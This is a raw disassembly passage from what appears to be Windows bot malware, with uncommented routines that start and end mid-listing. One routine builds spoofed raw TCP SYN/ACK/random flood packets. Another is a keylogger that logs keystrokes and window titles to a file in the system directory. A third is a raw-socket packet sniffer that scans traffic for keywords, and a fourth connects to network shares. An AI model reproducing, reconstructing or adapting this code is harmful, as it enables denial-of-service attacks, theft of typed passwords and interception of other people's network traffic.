cmp eax, [ebp+var_58]
jnb short loc_401D0F
jmp loc_401BA1
; ---------------------------------------------------------------------------
loc_401CE6: ; CODE XREF: sub_401A76+247�j
call ds:dword_43F5FC ; WSAGetLastError
push eax
lea eax, [ebp+var_F4]
push offset dword_4262B8
push eax
call sub_4172AE
lea eax, [ebp+var_F4]
push eax
call sub_40BF6D
add esp, 10h
jmp short loc_401D12
; ---------------------------------------------------------------------------
loc_401D0F: ; CODE XREF: sub_401A76+25B�j
; sub_401A76+269�j
mov ebx, [ebp+arg_8]
loc_401D12: ; CODE XREF: sub_401A76+78�j
; sub_401A76+297�j
push [ebp+var_C]
call ds:dword_43F700 ; closesocket
pop esi
loc_401D1C: ; CODE XREF: sub_401A76+5B�j
call ds:dword_43F5C8 ; WSACleanup
mov eax, ebx
loc_401D24: ; CODE XREF: sub_401A76+3B�j
pop edi
pop ebx
leave
retn
sub_401A76 endp
; =============== S U B R O U T I N E =======================================
sub_401D28 proc near ; CODE XREF: sub_4019D7+3C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40ADCA
push [esp+10h+arg_4]
mov esi, eax
call sub_41781F
push [esp+14h+arg_8]
mov ebx, eax
call sub_41781F
mov edi, eax
call sub_41730A
cdq
mov ecx, 200h
push edi
idiv ecx
push ebx
lea eax, [edx+esi+100h]
push eax
push esi
call sub_401A76
add esp, 1Ch
test eax, eax
jnz short loc_401D73
push 1
pop eax
loc_401D73: ; CODE XREF: sub_401D28+46�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_401D28 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D82 proc near ; DATA XREF: sub_40EE72+2D38�o
var_440 = byte ptr -440h
var_240 = dword ptr -240h
var_23C = byte ptr -23Ch
var_1BC = byte ptr -1BCh
var_13C = byte ptr -13Ch
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A0 = byte ptr -0A0h
var_9F = byte ptr -9Fh
var_8C = byte ptr -8Ch
var_80 = byte ptr -80h
var_78 = byte ptr -78h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_5B = byte ptr -5Bh
var_5A = word ptr -5Ah
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 440h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 68h
mov esi, eax
pop ecx
lea edi, [ebp+var_240]
rep movsd
push 1
xor ebx, ebx
pop esi
lea edi, [ebp+var_9F]
push 0Eh
mov [eax+19Ch], esi
pop ecx
xor eax, eax
mov [ebp+var_A0], bl
rep stosd
stosw
stosb
mov edi, ds:dword_424058
call edi ; GetTickCount
push eax
call sub_417300
pop ecx
push 0FFh
push 3
push 2
call ds:dword_43F6E8 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_401E4B
call ds:dword_43F5FC ; WSAGetLastError
push eax
lea eax, [ebp+var_440]
push offset dword_42642C
push eax
call sub_4172AE
add esp, 0Ch
cmp [ebp+var_A8], ebx
jnz short loc_401E2B
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_40D679
add esp, 14h
loc_401E2B: ; CODE XREF: sub_401D82+84�j
lea eax, [ebp+var_440]
push eax
call sub_40BF6D
push [ebp+var_BC]
call sub_417076
pop ecx
pop ecx
push ebx
call ds:dword_424054 ; ExitThread
loc_401E4B: ; CODE XREF: sub_401D82+61�j
lea ecx, [ebp+var_34]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_34], esi
call ds:dword_43F648 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_401EC9
call ds:dword_43F5FC ; WSAGetLastError
push eax
lea eax, [ebp+var_440]
push offset dword_4263E4
push eax
call sub_4172AE
add esp, 0Ch
cmp [ebp+var_A8], ebx
jnz short loc_401EA9
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_40D679
add esp, 14h
loc_401EA9: ; CODE XREF: sub_401D82+102�j
lea eax, [ebp+var_440]
push eax
call sub_40BF6D
push [ebp+var_BC]
call sub_417076
pop ecx
pop ecx
push ebx
call ds:dword_424054 ; ExitThread
loc_401EC9: ; CODE XREF: sub_401D82+DF�j
lea eax, [ebp+var_23C]
push eax
call ds:dword_43F6A8 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_401F39
lea eax, [ebp+var_440]
push offset dword_4263B4
push eax
call sub_4172AE
cmp [ebp+var_A8], ebx
pop ecx
pop ecx
jnz short loc_401F19
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_40D679
add esp, 14h
loc_401F19: ; CODE XREF: sub_401D82+172�j
lea eax, [ebp+var_440]
push eax
call sub_40BF6D
push [ebp+var_BC]
call sub_417076
pop ecx
pop ecx
push ebx
call ds:dword_424054 ; ExitThread
loc_401F39: ; CODE XREF: sub_401D82+157�j
push 10h
lea eax, [ebp+var_44]
push ebx
push eax
call sub_417330
add esp, 0Ch
mov [ebp+var_44], 2
push ebx
call ds:dword_43F668 ; htons
mov [ebp+var_42], ax
lea eax, [ebp+var_23C]
push eax
call ds:dword_43F6A8 ; inet_addr
mov [ebp+var_40], eax
mov [ebp+arg_0], ebx
call edi ; GetTickCount
mov [ebp+var_30], eax
loc_401F71: ; CODE XREF: sub_401D82+430�j
call edi ; GetTickCount
sub eax, [ebp+var_30]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_B4]
ja loc_402235
push 28h
mov [ebp+var_2C], 45h
call ds:dword_43F668 ; htons
cmp [ebp+var_B0], ebx
mov [ebp+var_2A], ax
mov [ebp+var_28], si
mov [ebp+var_26], bx
mov [ebp+var_24], 80h
mov [ebp+var_23], 6
mov [ebp+var_22], bx
jz short loc_401FE4
call sub_41730A
mov esi, eax
shl esi, 8
call sub_41730A
add esi, eax
shl esi, 8
call sub_41730A
add esi, eax
shl esi, 8
call sub_41730A
add esi, eax
push 1
mov [ebp+var_20], esi
pop esi
jmp short loc_401FFA
; ---------------------------------------------------------------------------
loc_401FE4: ; CODE XREF: sub_401D82+233�j
push [ebp+var_240]
call sub_40AEE0
pop ecx
push eax
call ds:dword_43F6A8 ; inet_addr
mov [ebp+var_20], eax
loc_401FFA: ; CODE XREF: sub_401D82+260�j
mov eax, [ebp+var_40]
cmp [ebp+var_B8], ebx
mov [ebp+var_1C], eax
jnz short loc_402018
call sub_41730A
cdq
mov ecx, 401h
idiv ecx
push edx
jmp short loc_40201E
; ---------------------------------------------------------------------------
loc_402018: ; CODE XREF: sub_401D82+284�j
push [ebp+var_B8]
loc_40201E: ; CODE XREF: sub_401D82+294�j
call ds:dword_43F668 ; htons
mov [ebp+var_16], ax
call sub_41730A
cdq
mov ecx, 401h
idiv ecx
push edx
call ds:dword_43F668 ; htons
push 12345678h
mov [ebp+var_18], ax
call ds:dword_43F664 ; htonl
mov [ebp+var_14], eax
lea eax, [ebp+var_1BC]
push offset aSyn ; "syn"
push eax
call sub_417880
pop ecx
test eax, eax
pop ecx
jz short loc_40206E
mov [ebp+var_10], ebx
mov [ebp+var_B], 2
jmp short loc_4020CA
; ---------------------------------------------------------------------------
loc_40206E: ; CODE XREF: sub_401D82+2E1�j
lea eax, [ebp+var_1BC]
push offset aAck ; "ack"
push eax
call sub_417880
pop ecx
test eax, eax
pop ecx
jz short loc_40208E
mov [ebp+var_10], ebx
mov [ebp+var_B], 10h
jmp short loc_4020CA
; ---------------------------------------------------------------------------
loc_40208E: ; CODE XREF: sub_401D82+301�j
lea eax, [ebp+var_1BC]
push offset aRandom ; "random"
push eax
call sub_417880
pop ecx
test eax, eax
pop ecx
jz short loc_4020CA
call sub_41730A
push 3
cdq
pop ecx
idiv ecx
mov [ebp+var_10], edx
call sub_41730A
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+var_B], dl
loc_4020CA: ; CODE XREF: sub_401D82+2EA�j
; sub_401D82+30A�j ...
push 200h
mov [ebp+var_C], 50h
call ds:dword_43F668 ; htons
mov [ebp+var_A], ax
mov eax, [ebp+var_20]
mov [ebp+var_64], eax
mov eax, [ebp+var_1C]
push 14h
mov [ebp+var_6], bx
mov [ebp+var_8], bx
mov [ebp+var_60], eax
mov [ebp+var_5C], bl
mov [ebp+var_5B], 6
call ds:dword_43F668 ; htons
mov [ebp+var_5A], ax
lea eax, [ebp+var_64]
push 20h
push eax
lea eax, [ebp+var_A0]
push eax
call sub_417390
lea eax, [ebp+var_18]
push 14h
push eax
lea eax, [ebp+var_80]
push eax
call sub_417390
lea eax, [ebp+var_A0]
push 34h
push eax
call sub_40AF39
mov [ebp+var_8], ax
lea eax, [ebp+var_2C]
push 14h
push eax
lea eax, [ebp+var_A0]
push eax
call sub_417390
lea eax, [ebp+var_18]
push 14h
push eax
lea eax, [ebp+var_8C]
push eax
call sub_417390
push 4
lea eax, [ebp+var_78]
push ebx
push eax
call sub_417330
add esp, 44h
lea eax, [ebp+var_A0]
push 28h
push eax
call sub_40AF39
mov [ebp+var_22], ax
lea eax, [ebp+var_2C]
push 14h
push eax
lea eax, [ebp+var_A0]
push eax
call sub_417390
add esp, 14h
lea eax, [ebp+var_44]
push 10h
push eax
push ebx
lea eax, [ebp+var_A0]
push 3Ch
push eax
push [ebp+var_4]
call ds:dword_43F6CC ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_4021B7
inc [ebp+arg_0]
jmp loc_401F71
; ---------------------------------------------------------------------------
loc_4021B7: ; CODE XREF: sub_401D82+42B�j
push [ebp+var_4]
call ds:dword_43F700 ; closesocket
call ds:dword_43F5FC ; WSAGetLastError
push eax
lea eax, [ebp+var_23C]
push [ebp+arg_0]
push eax
push offset dword_426344
lea eax, [ebp+var_440]
push 200h
push eax
call sub_41782A
add esp, 18h
cmp [ebp+var_A8], ebx
jnz short loc_402215
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_40D679
add esp, 14h
loc_402215: ; CODE XREF: sub_401D82+46E�j
lea eax, [ebp+var_440]
push eax
call sub_40BF6D
push [ebp+var_BC]
call sub_417076
pop ecx
pop ecx
push ebx
call ds:dword_424054 ; ExitThread
loc_402235: ; CODE XREF: sub_401D82+203�j
push [ebp+var_4]
call ds:dword_43F700 ; closesocket
mov eax, [ebp+arg_0]
xor edx, edx
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
div [ebp+var_B4]
shr ecx, 14h
push ecx
push eax
lea eax, [ebp+var_23C]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_1BC]
push eax
lea eax, [ebp+var_440]
push offset dword_4262E4
push eax
call sub_4172AE
add esp, 1Ch
cmp [ebp+var_A8], ebx
jnz short loc_4022A6
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_40D679
add esp, 14h
loc_4022A6: ; CODE XREF: sub_401D82+4FF�j
lea eax, [ebp+var_440]
push eax
call sub_40BF6D
push [ebp+var_BC]
call sub_417076
pop ecx
pop ecx
push ebx
call ds:dword_424054 ; ExitThread
sub_401D82 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4022C6 proc near ; CODE XREF: sub_4023A7+B4�p
; sub_4023A7+253�p
var_314 = byte ptr -314h
var_114 = byte ptr -114h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = byte ptr 14h
arg_8C = dword ptr 94h
arg_90 = dword ptr 98h
push ebp
mov ebp, esp
sub esp, 314h
lea eax, [ebp+var_10]
push esi
push eax
call ds:dword_42406C ; GetLocalTime
lea eax, [ebp+var_114]
push 104h
push eax
call ds:dword_424068 ; GetSystemDirectoryA
lea eax, [ebp+var_114]
push offset asc_426C1C ; "\\"
push eax
call sub_4179D0
lea eax, [ebp+var_114]
push offset dword_42F688
push eax
call sub_4179D0
lea eax, [ebp+var_114]
push offset aAb ; "ab"
push eax
call sub_4179A8
mov esi, eax
add esp, 18h
test esi, esi
jnz short loc_40232D
push 1
pop eax
jmp short loc_4023A4
; ---------------------------------------------------------------------------
loc_40232D: ; CODE XREF: sub_4022C6+60�j
movzx eax, [ebp+var_4]
push [ebp+arg_0]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset aDDDDDDS ; "[%d-%d-%d %d:%d:%d] %s\r\n"
push esi
call sub_417956
push esi
call sub_417900
add esp, 28h
cmp [ebp+arg_90], 0
jnz short loc_4023A2
push [ebp+arg_0]
lea eax, [ebp+var_314]
push offset dword_426BDC
push 200h
push eax
call sub_41782A
push 0
lea eax, [ebp+var_314]
push [ebp+arg_8C]
push eax
lea eax, [ebp+arg_C]
push eax
push [ebp+arg_4]
call sub_40D679
add esp, 24h
loc_4023A2: ; CODE XREF: sub_4022C6+A3�j
xor eax, eax
loc_4023A4: ; CODE XREF: sub_4022C6+65�j
pop esi
leave
retn
sub_4022C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4023A7 proc near ; DATA XREF: sub_40EE72+1F95�o
var_8DC = dword ptr -8DCh
var_8D8 = byte ptr -8D8h
var_4DC = byte ptr -4DCh
var_2DD = byte ptr -2DDh
var_2DC = byte ptr -2DCh
var_DC = byte ptr -0DCh
var_D8 = dword ptr -0D8h
var_48 = byte ptr -48h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8DCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
and [ebp+var_8DC], 0
push 25h
and [ebp+var_4], 0
pop ecx
mov esi, eax
lea edi, [ebp+var_DC]
rep movsd
mov dword ptr [eax+90h], 1
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp+var_8D8]
rep stosd
call ds:dword_43F5F0 ; GetForegroundWindow
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
mov [ebp+var_8], eax
call ds:dword_43F604 ; GetWindowTextA
mov ebx, 200h
loc_402402: ; CODE XREF: sub_4023A7+2C7�j
push 8
call ds:dword_424064 ; Sleep
call ds:dword_43F5F0 ; GetForegroundWindow
cmp eax, [ebp+var_8]
jz short loc_40248A
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
mov [ebp+var_8], eax
call ds:dword_43F604 ; GetWindowTextA
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2DC]
push eax
lea eax, [ebp+var_4DC]
push offset aSChangedWindow ; "%s (Changed Windows: %s)"
push eax
call sub_4172AE
sub esp, 84h
lea esi, [ebp+var_DC]
lea eax, [ebp+var_4DC]
push 25h
pop ecx
mov edi, esp
push eax
rep movsd
call sub_4022C6
mov [ebp+var_4], eax
push ebx
lea eax, [ebp+var_2DC]
push 0
push eax
call sub_417330
add esp, 0A4h
lea eax, [ebp+var_4DC]
push ebx
push 0
push eax
call sub_417330
add esp, 0Ch
loc_40248A: ; CODE XREF: sub_4023A7+6C�j
mov [ebp+arg_0], offset aB_0 ; "b"
loc_402491: ; CODE XREF: sub_4023A7+2BD�j
push 10h
call ds:dword_43F548 ; GetKeyState
movsx esi, ax
mov eax, [ebp+arg_0]
mov edi, [eax-4]
push edi
call ds:dword_43F634 ; GetAsyncKeyState
test ah, 80h
jz short loc_402529
push 14h
call ds:dword_43F548 ; GetKeyState
test ax, ax
jz short loc_4024DA
cmp esi, 0FFFFFFFFh
jle short loc_4024DA
cmp edi, 40h
jle short loc_4024DA
cmp edi, 5Bh
jge short loc_4024DA
mov [ebp+edi*4+var_8DC], 1
jmp loc_402659
; ---------------------------------------------------------------------------
loc_4024DA: ; CODE XREF: sub_4023A7+112�j
; sub_4023A7+117�j ...
push 14h
call ds:dword_43F548 ; GetKeyState
test ax, ax
jz short loc_402505
test esi, esi
jge short loc_402519
cmp edi, 40h
jle short loc_402505
cmp edi, 5Bh
jge short loc_402505
mov [ebp+edi*4+var_8DC], 2
jmp loc_402659
; ---------------------------------------------------------------------------
loc_402505: ; CODE XREF: sub_4023A7+13E�j
; sub_4023A7+147�j ...
test esi, esi
jge short loc_402519
mov [ebp+edi*4+var_8DC], 3
jmp loc_402659
; ---------------------------------------------------------------------------
loc_402519: ; CODE XREF: sub_4023A7+142�j
; sub_4023A7+160�j
mov [ebp+edi*4+var_8DC], 4
jmp loc_402659
; ---------------------------------------------------------------------------
loc_402529: ; CODE XREF: sub_4023A7+105�j
mov esi, [ebp+edi*4+var_8DC]
lea eax, [ebp+edi*4+var_8DC]
test esi, esi
jz loc_402659
and dword ptr [eax], 0
lea eax, [ebp+var_2DC]
cmp edi, 8
push eax
jnz short loc_402561
call sub_417AB0
and [ebp+eax+var_2DD], 0
pop ecx
jmp loc_402659
; ---------------------------------------------------------------------------
loc_402561: ; CODE XREF: sub_4023A7+1A5�j
call sub_417AB0
cmp eax, 1B9h
pop ecx
jbe short loc_402593
call ds:dword_43F5F0 ; GetForegroundWindow
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
call ds:dword_43F604 ; GetWindowTextA
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2DC]
push eax
push offset aSBufferFullS ; "%s (Buffer full) (%s)"
jmp short loc_4025D4
; ---------------------------------------------------------------------------
loc_402593: ; CODE XREF: sub_4023A7+1C5�j
cmp edi, 0Dh
jnz loc_40262B
lea eax, [ebp+var_2DC]
push eax
call sub_417AB0
test eax, eax
pop ecx
jz loc_402659
call ds:dword_43F5F0 ; GetForegroundWindow
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
call ds:dword_43F604 ; GetWindowTextA
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2DC]
push eax
push offset aSReturnS ; "%s (Return) (%s)"
loc_4025D4: ; CODE XREF: sub_4023A7+1EA�j
lea eax, [ebp+var_4DC]
push eax
call sub_4172AE
sub esp, 84h
lea esi, [ebp+var_DC]
lea eax, [ebp+var_4DC]
push 25h
pop ecx
mov edi, esp
push eax
rep movsd
call sub_4022C6
mov [ebp+var_4], eax
push ebx
lea eax, [ebp+var_2DC]
push 0
push eax
call sub_417330
add esp, 0A4h
lea eax, [ebp+var_4DC]
push ebx
push 0
push eax
call sub_417330
add esp, 0Ch
jmp short loc_402659
; ---------------------------------------------------------------------------
loc_40262B: ; CODE XREF: sub_4023A7+1EF�j
cmp esi, 1
jz short loc_402644
cmp esi, 3
jz short loc_402644
cmp esi, 2
jz short loc_40263F
cmp esi, 4
jnz short loc_402659
loc_40263F: ; CODE XREF: sub_4023A7+291�j
push [ebp+arg_0]
jmp short loc_40264B
; ---------------------------------------------------------------------------
loc_402644: ; CODE XREF: sub_4023A7+287�j
; sub_4023A7+28C�j
mov eax, [ebp+arg_0]
add eax, 7
push eax
loc_40264B: ; CODE XREF: sub_4023A7+29B�j
lea eax, [ebp+var_2DC]
push eax
call sub_4179D0
pop ecx
pop ecx
loc_402659: ; CODE XREF: sub_4023A7+12E�j
; sub_4023A7+159�j ...
add [ebp+arg_0], 14h
cmp [ebp+arg_0], offset dword_426BA4
jl loc_402491
cmp [ebp+var_4], 0
jz loc_402402
push [ebp+var_D8]
call sub_417076
pop ecx
push 0
call ds:dword_424054 ; ExitThread
sub_4023A7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402688 proc near ; DATA XREF: sub_40EE72+1DDB�o
var_102B4 = byte ptr -102B4h
var_102AB = byte ptr -102ABh
var_102A8 = dword ptr -102A8h
var_102A0 = dword ptr -102A0h
var_10293 = byte ptr -10293h
var_1028C = byte ptr -1028Ch
var_2B4 = byte ptr -2B4h
var_B4 = dword ptr -0B4h
var_B0 = byte ptr -0B0h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = byte ptr -20h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 102B4h
call sub_417B30
mov edx, [ebp+arg_0]
push esi
push edi
push 1
pop eax
mov esi, edx
push 25h
lea edi, [ebp+var_B4]
pop ecx
mov [ebp+var_8], eax
rep movsd
mov [edx+90h], eax
xor esi, esi
push 10h
lea eax, [ebp+var_1C]
push esi
push eax
call sub_417330
add esp, 0Ch
mov [ebp+var_1C], 2
push esi
call ds:dword_43F668 ; htons
push [ebp+var_B4]
mov [ebp+var_1A], ax
call sub_40AEE0
pop ecx
push eax
call ds:dword_43F6A8 ; inet_addr
push esi
push 3
push 2
mov [ebp+var_18], eax
call ds:dword_43F6E8 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jnz short loc_40275D
call ds:dword_43F5FC ; WSAGetLastError
push eax
lea eax, [ebp+var_2B4]
push offset unk_427604
push eax
call sub_4172AE
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_402740
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_40D679
add esp, 14h
loc_402740: ; CODE XREF: sub_402688+96�j
lea eax, [ebp+var_2B4]
push eax
call sub_40BF6D
push [ebp+var_30]
call sub_417076
pop ecx
pop ecx
push esi
call ds:dword_424054 ; ExitThread
loc_40275D: ; CODE XREF: sub_402688+76�j
mov eax, [ebp+var_30]
push 10h
imul eax, 234h
mov ds:dword_4450CC[eax], edi
lea eax, [ebp+var_1C]
push eax
push edi
call ds:dword_43F694 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_4027E2
call ds:dword_43F5FC ; WSAGetLastError
push eax
lea eax, [ebp+var_2B4]
push offset unk_4275C0
push eax
call sub_4172AE
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_4027BE
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_40D679
add esp, 14h
loc_4027BE: ; CODE XREF: sub_402688+114�j
lea eax, [ebp+var_2B4]
push eax
call sub_40BF6D
pop ecx
push edi
call ds:dword_43F700 ; closesocket
push [ebp+var_30]
call sub_417076
pop ecx
push esi
call ds:dword_424054 ; ExitThread
loc_4027E2: ; CODE XREF: sub_402688+F4�j
push esi
lea eax, [ebp+var_20]
push esi
push eax
push esi
push esi
lea eax, [ebp+var_8]
push 4
push eax
push 98000001h
push edi
call ds:dword_43F614 ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_402865
call ds:dword_43F5FC ; WSAGetLastError
push eax
lea eax, [ebp+var_2B4]
push offset unk_427578
push eax
call sub_4172AE
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_402841
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_40D679
add esp, 14h
loc_402841: ; CODE XREF: sub_402688+197�j
lea eax, [ebp+var_2B4]
push eax
call sub_40BF6D
pop ecx
push edi
call ds:dword_43F700 ; closesocket
push [ebp+var_30]
call sub_417076
pop ecx
push esi
call ds:dword_424054 ; ExitThread
loc_402865: ; CODE XREF: sub_402688+177�j
push ebx
mov ebx, offset dword_426C78
loc_40286B: ; CODE XREF: sub_402688+21B�j
; sub_402688+22D�j ...
mov edi, 0FFFFh
lea eax, [ebp+var_102B4]
push edi
push esi
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_102B4]
push esi
push edi
push eax
push [ebp+var_4]
call ds:dword_43F680 ; recv
cmp eax, 0FFFFFFFFh
jz loc_40297D
cmp [ebp+var_102AB], 6
jnz short loc_40286B
mov eax, [ebp+var_102A8]
cmp [ebp+var_10293], 18h
mov [ebp+var_C], eax
jnz short loc_40286B
lea eax, [ebp+var_1028C]
push offset aPsniff ; "[PSNIFF]"
push eax
call sub_417880
pop ecx
test eax, eax
pop ecx
jnz short loc_40286B
mov eax, ebx
xor edi, edi
test eax, eax
jz short loc_40286B
mov [ebp+arg_0], ebx
loc_4028D9: ; CODE XREF: sub_402688+26C�j
push eax
lea eax, [ebp+var_1028C]
push eax
call sub_417880
pop ecx
test eax, eax
pop ecx
jnz short loc_4028FB
inc edi
add [ebp+arg_0], 18h
mov eax, [ebp+arg_0]
jnz short loc_4028D9
jmp loc_40286B
; ---------------------------------------------------------------------------
loc_4028FB: ; CODE XREF: sub_402688+262�j
lea eax, [ebp+var_1028C]
push eax
push [ebp+var_102A0]
call ds:dword_43F5A4 ; htons
movzx eax, ax
push eax
push [ebp+var_C]
call ds:dword_43F6F4 ; inet_ntoa
push eax
lea eax, [edi+edi*2]
mov eax, ds:dword_426C8C[eax*8]
push ds:off_426C68[eax*4]
lea eax, [ebp+var_2B4]
push offset unk_427528
push 200h
push eax
call sub_41782A
add esp, 1Ch
cmp [ebp+var_28], esi
jnz short loc_40296B
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_40D679
add esp, 14h
loc_40296B: ; CODE XREF: sub_402688+2C1�j
lea eax, [ebp+var_2B4]
push eax
call sub_40BF6D
pop ecx
jmp loc_40286B
; ---------------------------------------------------------------------------
loc_40297D: ; CODE XREF: sub_402688+20E�j
call ds:dword_43F5FC ; WSAGetLastError
push eax
push offset unk_4274E4
lea eax, [ebp+var_2B4]
push 200h
push eax
call sub_41782A
add esp, 10h
cmp [ebp+var_28], esi
pop ebx
jnz short loc_4029C3
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_40D679
add esp, 14h
loc_4029C3: ; CODE XREF: sub_402688+319�j
lea eax, [ebp+var_2B4]
push eax
call sub_40BF6D
pop ecx
push [ebp+var_4]
call ds:dword_43F700 ; closesocket
push [ebp+var_30]
call sub_417076
pop ecx
push esi
call ds:dword_424054 ; ExitThread
sub_402688 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4029E9 proc near ; CODE XREF: sub_402DD7+28�p
var_354 = byte ptr -354h
var_34E = byte ptr -34Eh
var_124 = byte ptr -124h
var_123 = byte ptr -123h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 354h
push ebx
push esi
push edi
mov esi, offset off_427B6C
lea edi, [ebp+var_C]
mov ecx, 8Ah
movsd
movsd
movsd
mov esi, offset asc_427B64 ; "\\\\"
lea edi, [ebp+var_354]
movsd
movsw
xor eax, eax
lea edi, [ebp+var_34E]
rep stosd
stosw
mov al, ds:byte_43C80C
push 45h
mov [ebp+var_124], al
pop ecx
xor eax, eax
lea edi, [ebp+var_123]
rep stosd
stosw
stosb
lea eax, [ebp+var_124]
push 0FFh
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
xor edi, edi
push edi
push edi
call ds:dword_424070 ; MultiByteToWideChar
lea eax, [ebp+var_124]
push eax
lea eax, [ebp+var_354]
push eax
call sub_417B5F
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_354]
push eax
call sub_417B5F
mov esi, [ebp+arg_4]
lea eax, [ebp+var_354]
add esp, 10h
mov [esi+14h], eax
mov eax, offset dword_43C808
push edi
push eax
push eax
push esi
mov [esi+4], edi
mov [esi+10h], edi
mov [esi+1Ch], edi
call ds:dword_43F708
cmp eax, 5
mov ebx, 4C3h
jz short loc_402AAD
cmp eax, ebx
jnz short loc_402AB7
loc_402AAD: ; CODE XREF: sub_4029E9+BE�j
push edi
push edi
push edi
push esi
call ds:dword_43F708
loc_402AB7: ; CODE XREF: sub_4029E9+C2�j
cmp eax, 5
jz short loc_402AC5
cmp eax, ebx
jz short loc_402AC5
push 1
pop eax
jmp short loc_402AC7
; ---------------------------------------------------------------------------
loc_402AC5: ; CODE XREF: sub_4029E9+D1�j
; sub_4029E9+D5�j
xor eax, eax
loc_402AC7: ; CODE XREF: sub_4029E9+DA�j
pop edi
pop esi
pop ebx
leave
retn
sub_4029E9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402ACC proc near ; CODE XREF: sub_402DD7+7A�p
; sub_402DD7+15A�p
